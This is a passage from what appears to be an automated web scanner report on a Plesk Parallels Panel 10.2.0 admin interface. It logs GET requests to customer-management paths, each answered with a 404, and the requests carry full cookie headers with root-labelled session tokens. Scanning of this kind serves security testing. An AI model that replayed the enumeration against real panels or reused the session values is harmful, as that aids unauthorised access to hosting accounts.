Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; reseller_report__report_id=2; PHPSESSID=e3ad4a00f2610cf68740be8917e0c8b4; psaContext=service-plans; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True; backuplocalrepositorylist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjEyOiJkYXRlX3JldmVyc2UiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; custombuttonslist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; reportautolist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; filelist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Type: text/html
Content-Length: 345
Date: Sat, 24 Sep 2011 15:43:03 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

12.85. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/customer-service-plan/list-data  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /customer-service-plan/list-data

Request

GET /customer-service-plan/list-data HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Type: text/html
Content-Length: 345
Date: Fri, 23 Sep 2011 19:24:44 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

12.86. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/customer/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /customer/

Request

GET /customer/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; PHPSESSID=650d277c6582dd6296b0d447081dc10c; reseller_report__report_id=2; psaContext=reseller-tools; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Type: text/html
Content-Length: 345
Date: Sat, 24 Sep 2011 14:16:00 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

12.87. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/customer/activate/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /customer/activate/

Request

GET /customer/activate/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Type: text/html
Content-Length: 345
Date: Fri, 23 Sep 2011 19:20:09 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

12.88. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/customer/change-subscription/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /customer/change-subscription/

Request

GET /customer/change-subscription/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; PHPSESSID=d2d161e01ff538a0e1392cab512865cd; reseller_report__report_id=2; psaContext=customers; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True; backuplocalrepositorylist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjEyOiJkYXRlX3JldmVyc2UiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; custombuttonslist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; reportautolist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; filelist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; adminclienttrafficlist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjthOjE6e3M6NDoibmFtZSI7czowOiIiO31zOjQ6InBhZ2UiO2k6MDtzOjg6InBhZ2VTaXplIjtpOjI1O30%3D; sessionslist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Type: text/html
Content-Length: 345
Date: Sat, 24 Sep 2011 16:02:47 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

12.89. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/customer/change-subscription/id/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /customer/change-subscription/id/

Request

GET /customer/change-subscription/id/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; PHPSESSID=d2d161e01ff538a0e1392cab512865cd; reseller_report__report_id=2; psaContext=customers; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True; backuplocalrepositorylist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjEyOiJkYXRlX3JldmVyc2UiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; custombuttonslist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; reportautolist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; filelist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; adminclienttrafficlist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjthOjE6e3M6NDoibmFtZSI7czowOiIiO31zOjQ6InBhZ2UiO2k6MDtzOjg6InBhZ2VTaXplIjtpOjI1O30%3D; sessionslist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Type: text/html
Content-Length: 345
Date: Sat, 24 Sep 2011 16:02:47 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

12.90. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/customer/change-subscription/id/4  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /customer/change-subscription/id/4

Request

GET /customer/change-subscription/id/4 HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/customer/overview/id/4
Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; PHPSESSID=d2d161e01ff538a0e1392cab512865cd; reseller_report__report_id=2; psaContext=customers; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True; backuplocalrepositorylist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjEyOiJkYXRlX3JldmVyc2UiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; custombuttonslist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; reportautolist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; filelist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; adminclienttrafficlist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjthOjE6e3M6NDoibmFtZSI7czowOiIiO31zOjQ6InBhZ2UiO2k6MDtzOjg6InBhZ2VTaXplIjtpOjI1O30%3D; sessionslist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Type: text/html
Content-Length: 345
Date: Sat, 24 Sep 2011 16:02:47 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

12.91. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/customer/create  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /customer/create

Request

GET /customer/create HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Type: text/html
Content-Length: 345
Date: Fri, 23 Sep 2011 19:19:58 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

12.92. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/customer/delete-current/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /customer/delete-current/

Request

GET /customer/delete-current/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; PHPSESSID=d2d161e01ff538a0e1392cab512865cd; reseller_report__report_id=2; psaContext=customers; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True; backuplocalrepositorylist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjEyOiJkYXRlX3JldmVyc2UiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; custombuttonslist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; reportautolist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; filelist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; adminclienttrafficlist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjthOjE6e3M6NDoibmFtZSI7czowOiIiO31zOjQ6InBhZ2UiO2k6MDtzOjg6InBhZ2VTaXplIjtpOjI1O30%3D; sessionslist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Type: text/html
Content-Length: 345
Date: Sat, 24 Sep 2011 16:02:47 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

12.93. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/customer/delete-current/id/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /customer/delete-current/id/

Request

GET /customer/delete-current/id/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; PHPSESSID=d2d161e01ff538a0e1392cab512865cd; reseller_report__report_id=2; psaContext=customers; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True; backuplocalrepositorylist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjEyOiJkYXRlX3JldmVyc2UiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; custombuttonslist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; reportautolist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; filelist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; adminclienttrafficlist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjthOjE6e3M6NDoibmFtZSI7czowOiIiO31zOjQ6InBhZ2UiO2k6MDtzOjg6InBhZ2VTaXplIjtpOjI1O30%3D; sessionslist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Type: text/html
Content-Length: 345
Date: Sat, 24 Sep 2011 16:02:47 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

12.94. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/customer/delete-current/id/4  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /customer/delete-current/id/4

Request

GET /customer/delete-current/id/4 HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/customer/overview/id/4
Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; PHPSESSID=d2d161e01ff538a0e1392cab512865cd; reseller_report__report_id=2; psaContext=customers; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True; backuplocalrepositorylist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjEyOiJkYXRlX3JldmVyc2UiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; custombuttonslist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; reportautolist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; filelist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; adminclienttrafficlist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjthOjE6e3M6NDoibmFtZSI7czowOiIiO31zOjQ6InBhZ2UiO2k6MDtzOjg6InBhZ2VTaXplIjtpOjI1O30%3D; sessionslist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Type: text/html
Content-Length: 345
Date: Sat, 24 Sep 2011 16:02:47 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

12.95. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/customer/delete/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /customer/delete/

Request

GET /customer/delete/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Type: text/html
Content-Length: 345
Date: Fri, 23 Sep 2011 19:20:00 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

12.96. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/customer/list  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /customer/list

Request

GET /customer/list HTTP/1.1
